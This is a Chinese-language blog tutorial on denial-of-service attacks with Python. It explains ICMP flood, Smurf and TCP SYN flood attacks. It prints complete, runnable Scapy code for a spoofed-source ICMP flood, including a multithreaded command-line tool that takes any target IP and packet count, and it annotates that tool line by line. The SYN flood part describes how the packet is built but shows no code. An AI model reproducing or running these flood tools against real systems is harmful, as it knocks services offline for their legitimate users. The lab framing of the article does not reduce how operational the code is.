python网络渗透之：DOS攻击篇

python网络渗透之：DOS攻击篇

本篇文章主要介绍，python在网络攻击中的DOS攻击类型中起到的作用，介绍什么是ICMP Flood DOS、TCP SYN Flood DOS。

什么是Dos攻击？所谓的DOS攻击就是，即拒绝服务攻击（Denial Service attack），指在通过耗尽目标系统的资源，使其无法提供正常的服务。这种攻击通常会导致系统奔溃、停机或变得不可用。

可能我们平常听的最多的是DDOS攻击即分布式拒绝服务攻击（Denial of Service attack），DDOS攻击的本质就是DOS攻击，只不过DOS攻击是单一的网络来源，而DDOS则是多个网络来源。

有一部不错的电影：“D战”，这部影片讲述的就是在某黑客组织利用DDOS等网络攻击手段攻击国内一家大型网络科技公司服务器后进行敲诈勒索，公安机关网络警察运用技术手段，通过缜密侦查并跨境开展执法合作，最终成功缉捕犯罪嫌疑人、摧毁黑客组织。该影片由腾讯视频独播，影片剧情内容丰富精彩，是一部值得推荐的网络安全影视类作品。

**DOS攻击的分类：**DOS攻击主要分为两种类型：弱点DOS攻击和泛洪DOS攻击。

• 弱点DOS攻击：指利用系统或应用程序中的漏洞，通过向目标系统发送特定伪造的数据包，从而使系统奔溃或无法正常工作。常见的弱点DOS攻击包括：Ping of Death、Teardrop等。

• 泛洪DOS攻击：也称流量攻击，是指攻击者通过向目标系统发送大量的请求或数据包，以占用其网络宽带、CPU、存储器、和其他资源，导致目标系统无法处理正常的服务请求。常见的泛洪DOS攻击包括：UDP Flood、TCP Flood、ICMP Flood等。

那么我们废话不多说，学习过了scapy之后我们应该很容易就可以编写出相对应的攻击脚本

一、使用python编写ICMP Flood DOS 脚本

初步尝试

from scapy.all import *
from scapy.layers.inet import *
from ipaddress import ip_network

def create_ip():
    from random import choice
    ip_pool = []
    for ip in ip_network("192.168.2.0/24"):
        ip_pool.append(ip)
    return str(random.choice(ip_pool))

def ICMP_FLOOD(src_ip,dst_ip):
    from random import randint
    attack_data_package = IP(src = src_ip , dst = dst_ip , id = random.randint(100,1000))/ICMP(id = random.randint(100,1000) , seq = random.randint(100,1000))/"5656566"
    for i in range(2000):
        print(f"[+]rip:{src_ip}--->dip:{dst_ip} Ok !")
        send(attack_data_package,verbose=False)
def main():
    import sys
    ICMP_FLOOD(create_ip(),str(sys.argv[1]))

if __name__ == '__main__':
    main()

• 可以看到我们在代码中，使用create_ip()来随机生成源ip地址来伪造ip，

• 然后在ICMP_FLOOD()来发起攻击，在这个函数里我们构造了IP/ICMP的数据包，使用for循环来发送指定的包次。

• 最后在main()函数中调用来实现攻击。

我们本次以Ubuntu这台机器为攻击目标，IP地址是：192.168.64.140，我们通过iftop来监测网络流量数据

我们来看看效果：

可以看到，随着我们发的包越来越多，iftop的检测数据的条也就越来越长，相应的数据大小也有明显的变化。

以下是改进之后的ICMP Flood DOS python代码：

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

data_package_number = 0

class IFD():
    def __init__(self):
        pass
    def icmp_dos_log(self):
        log ="""
          ___ ____ __  __ ____    ____   ___  ____     options:
         |_ _/ ___|  \/  |  _ \  |  _ \ / _ \/ ___|      --appoint ip:
          | | |   | |\/| | |_) | | | | | | | \___ \\              -d >> -d[objective ip]
          | | |___| |  | |  __/  | |_| | |_| |___) |     --appoint send package number(recommend even):
         |___\____|_|  |_|_|     |____/ \___/|____/               -o >> -o[number]
            -------------------------------
            version: v_1.1 developer: hare
            -------------------------------
        """
        return log

    def create_ip(self):
        from ipaddress import ip_network
        self.ip_pool = []
        r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
        for ip in r_ip:
            self.ip_pool.append(ip)
        return str(choice(self.ip_pool))

    def send_data_package(self,ip_dst,sp_num):
        global data_package_number
        sp_num = int(int(sp_num)/2)
        # ip_src = self.create_ip()
        for i in range(sp_num):
            ip_src = self.create_ip()
            data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))
            send(data_package,verbose=False)
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number+=1
        if sp_num%2 != 0:
            ip_src = self.create_ip()
            data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
            send(data_package, verbose=False)
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number += 1


def main():
    import sys
    icmp_flood_dos = IFD()
    print(icmp_flood_dos.icmp_dos_log())
    try:
        if sys.argv[1] == "-d" and sys.argv[3] == "-o":
            time_1 = time.time()
            thread_pool = []
            for thread in range(2):
                dos_thread = Thread(target=icmp_flood_dos.send_data_package,args=(sys.argv[2],sys.argv[4]))
                dos_thread.start()
                thread_pool.append(dos_thread)
            for tp in thread_pool:
                tp.join()
            time_2 = time.time()
            times = time_2-time_1
            print(f"\r\n[*]The runtime of this attack is:({times}) second !")
            print("[+]data package number is: ",data_package_number)
        else:
            print("[Error Type] options type is error !")
            time.sleep(1)
    except:
        if len(sys.argv) == 1:
            pass
        else:
            print("[Error Options] options is error !")
            time.sleep(1)
if __name__ == '__main__':
    main()
    time.sleep(2)

下面给出代码的解析：

一、 导入需要的库

from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time

二、定义一个类IFD，包含icmp_dos_log()、create_ip()和send_data_package()三个方法

class IFD():
    def __init__(self):
        pass
    def icmp_dos_log(self):
        # 返回攻击脚本的log界面及使用说明
        log ="""
          ___ ____ __  __ ____    ____   ___  ____     options:
         |_ _/ ___|  \/  |  _ \  |  _ \ / _ \/ ___|      --appoint ip:
          | | |   | |\/| | |_) | | | | | | | \___ \\              -d >> -d[objective ip]
          | | |___| |  | |  __/  | |_| | |_| |___) |     --appoint send package number(recommend even):
         |___\____|_|  |_|_|     |____/ \___/|____/               -o >> -o[number]
            -------------------------------
            version: v_1.1 developer: hare
            -------------------------------
        """
        return log

	# 随机生成源IP地址
    def create_ip(self):
        from ipaddress import ip_network
        self.ip_pool = []
        r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
        for ip in r_ip:
            # 将生成的IP网络地址池加入到ip_pool列表中
            self.ip_pool.append(ip)
        # 返回随机选择的IP地址
        return str(choice(self.ip_pool))

    def send_data_package(self,ip_dst,sp_num):
        global data_package_number
        # 将要发送的数据包数量除以2，因为会有两个线程分别发送，为了避免重复，每个线程发送数据包数量为总数的一半。
        sp_num = int(int(sp_num)/2)
        for i in range(sp_num):
			#调用create_ip生成源ip地址，使每次发包产生不同的源ip地址
            ip_src = self.create_ip()
            # 构造ICMP数据包
            data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))
            # 发送数据包
            send(data_package,verbose=False)
            # 打印发送成功信息
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number+=1
        # 若数据包数量为奇数，则再发送一份数据包（即多发送一次）
        if sp_num%2 != 0:
            ip_src = self.create_ip()
            data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
            send(data_package, verbose=False)
            print(f"[+]rip:{ip_src}--->dip:{ip_dst} Ok !")
            data_package_number += 1

三、定义主函数main()

	def main():
	    import sys
	    icmp_flood_dos = IFD()
	    # 打印攻击脚本的log界面及使用说明
	    print(icmp_flood_dos.icmp_dos_log())
	    try:
	        if sys.argv[1] == "-d" and sys.argv[3] == "-o":
	            # 开始计时
	            time_1 = time.time()
	            thread_pool = []
	            # 创建两个线程分别发送数据包
	            for thread in range(2):
	                dos_thread = Thread(target=icmp_flood_dos.send_data_package,args=(sys.argv[2],sys.argv[4]))
	                dos_thread.start()
	                # 将两个线程加入到线程池中
	                thread_pool.append(dos_thread)
	            # 等待两个线程执行完毕
	            for tp in thread_pool:
	                tp.join()
	            # 结束计时
	            time_2 = time.time()
	            times = time_2-time_1
	            # 打印攻击所用时间和发送数据包数量
	            print(f"\r\n[*]The runtime of this attack is:({times})

效果如图所示：

扩展介绍：Smurf攻击(ICMP放大反射)

Smurf攻击是旨在通过发送大量伪造的ICMP回应数据报给一个或多个目标IP地址来使其宕机。这种攻击方式得名于使用了一种叫做“Smurf程序”的工具。Smurf攻击就是属于DDOS攻击的一种。

Smurf攻击的原理是利用了ICMP Echo Request消息（即Ping请求），当有大量的Echo Request消息被发送到网上广播地址（Broadcast Address），所有收到此消息的主机都会向源IP地址回复并返回ICMP Echo Reply消息（即Ping响应）。如果攻击者将源IP地址设置为目标IP地址，那么目标主机就会接收到所有由网络中的主机发出的Ping响应流量，从而导致目标主机因为过多的Ping响应而无法正常工作，甚至可能导致系统崩溃。因此我们称这种攻击也叫ICMP放大反射攻击。我们可以通过一张图片来简要了解Smurf攻击：‘

Smurf攻击可以轻易地实现分布式攻击，只需要攻击者控制一些感染了Smurf程序的“僵尸”计算机，然后协同这些计算机一起对目标进行攻击。这种攻击方式不仅容易发动，而且攻击效果也非常显著，因此Smurf攻击曾经在过去的网络攻击事件中频繁出现，但随着防御技术的提高和安全意识的增强，Smurf攻击已经逐渐减少。

---

TCP SYN Flood DOS

我们先来介绍以下什么是“TCP SYN Flood DOS”：

• TCP SYN Flood DOS也可以叫做“TCP SYN攻击”，这种攻击实质上是利用了TCP协议的漏洞也就是TCP连接中的“三次握手”中的漏洞来进行攻击的。攻击者通过发送大量的“SYN”连接请求，使目标主机对各个请求发送“SYN+ACK”的请求加响应，然后攻击者对目标主机的ACK请求不做对应的响应(攻击者通常将源IP伪装成不可达的IP)使得目标主机重复发送ACK给攻击者，由于攻击者发送了大量的这种TCP连接，而每一次都无法完成三次握手，在服务器上，这些TCP连接会因为“挂起状态”而消耗CPU和内存，最后服务器可能死机，就无法为正常用户提供服务了，同时我们也称这种连接叫做“SYN半连接状态”。

对于不太了解TCP三次握手四次挥手的读者，可以参考我的《网络通信之：TCP三次握手四次挥手》这篇文章

善意的TCP三次握手连接是这样的：

恶意的TCP三次握手连接是这样的：

我们再详细的谈谈攻击者是如何让目标主机拒绝服务的：

• 首先攻击者伪装不可达的IP地址，向目标主机发送SYN同步信息

• 在目标主机上会有一个缓存，这个缓存用于存储发送过来的SYN同步信息，接着就向攻击者发送SYN+ACK的数据包

• 由于目标主机使用的是伪装的不可达的IP，所以这个SYN+ACK的数据包就不会被接收到，那么目标主机发送的SYN同步信息就像落入一个黑洞一样自然就不会被响应，在RTT往返时间范围之内，当攻击者没有及时响应服务器发送的SYN+ACK包时，服务器会认为连接建立失败，并等待一段时间再进行释放SYN半开连接信息。

• 那我们设想这么一个场景：如果攻击者在RTT往返时间范围之内发送大量的这种SYN半开连接信息，以至于将目标主机的缓存填满，使得合法的连接请求无法得到处理，这就可能会导致目标主机无法正常的被访问，导致拒绝服务。

**RTT(Round Trip Time)往返时间：**RTT往返时间指的是从客户端发送FIN包到客户端接收到服务器的ACK包的时间。在局域网内或者高速广域网上，RTT往返时间通常较低，可以在几毫秒甚至几十毫秒内完成。而在全球范围内进行数据传输时，RTT往返时间可能会增加到数百毫秒、甚至更高,一般的RTT往返时间是没有一个确定的值的，需要根据具体情况进行评估和优化。

对于响应的攻击代码，与之前的ICMP Flood attack相似，这里给出核心：

说一下这个包的构造过程：

• 对于src我们是使用随机的ip来产生的，在IP数据包后面我们跟上的是TCP数据包，主要指定了sport(源端口)和dport(目的端口)以及flags值指定为‘S’(SYN包)，seq(初始序列号)。

然后我们正常的使用while True 或者 for来循环发送数据包，效果如图所示：

这里我们是直接使用了Wireshark来抓包。可以看到我们伪造了大量的IP向192.168.64.130发起了TCP的连接，在目标主机上我们使用Wireshark看到各种IP在给自身发送SYN同步信息当自身给各种IP回数据时都产生了异常。